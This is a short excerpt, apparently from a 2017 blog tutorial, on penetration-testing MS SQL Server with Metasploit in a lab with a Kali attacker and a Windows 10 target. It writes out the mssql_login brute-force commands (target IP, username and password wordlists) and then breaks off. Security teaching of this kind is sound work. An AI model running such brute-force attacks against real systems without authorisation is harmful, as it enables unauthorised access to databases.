MSSQL Penetration Testing with Metasploit

Nov. 12, 2017 0 comments www.pentestingexperts.com Pen Testing & Audits

Requirement Attacker: kali Linux (NMAP) Target: Windows 10 (MS SQL Server) Let’s start!! MSSQL Brute force Attack This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank). use auxiliary/scanner/mssql/mssql_login msf auxiliary(mssql_login) > set rhosts 192.168.1.104 msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt msf auxiliary(mssql_login) > run …

http://www.pentestingexperts.com/mssql-penetration-testing-with-metasploit/